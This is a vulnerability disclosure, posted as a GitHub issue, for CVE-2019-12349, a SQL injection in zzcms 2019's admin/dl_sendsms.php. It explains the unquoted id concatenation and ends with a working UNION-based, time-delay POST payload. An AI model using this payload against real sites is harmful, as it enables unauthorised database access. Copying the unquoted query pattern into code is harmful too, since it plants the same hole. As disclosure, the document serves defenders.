CVE-2019-12349: zzcms 2019 admin/dl_sendsms.php SQL injection · Issue #2 · cby234/zzcms

Link Url : http://www.zzcms.net/about/6.htm
Edition : ZZCMS2018升2019 (2019-01-11)

0x01 Vulnerability (/admin/dl_sendsms.php line 17 ~ 37)

Let’s look at SQL query part

If index of , value is not 0 sql will be
(/* if(strpos($id,",")>0) */ => line 32)

"select * from zzcms_dl where saver<>’’ and id in (“. $id .”)"

There is no single quote for id parameter. So We can inject any sql in id parameter
(Because of IF condition We should add “,” value at the last of id parameter value)

0x02 payload

give below “POC” value for post data in “/admin/dl_sendsms.php”

POC : Union SQL injection submit23=%E7%BB%99%E6%8E%A5%E6%94%B6%E8%80%85%E5%8F%91%E6%89%8B%E6%9C%BA%E7%9F%AD%E4%BF%A1%E6%8F%90%E9%86%92&pagename=dl_manage.php%3Fb%3D0%26shenhe%3D%26page%3D1&tablename=zzcms_dl&id%5B%5D=1) union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,sleep(3)-- a,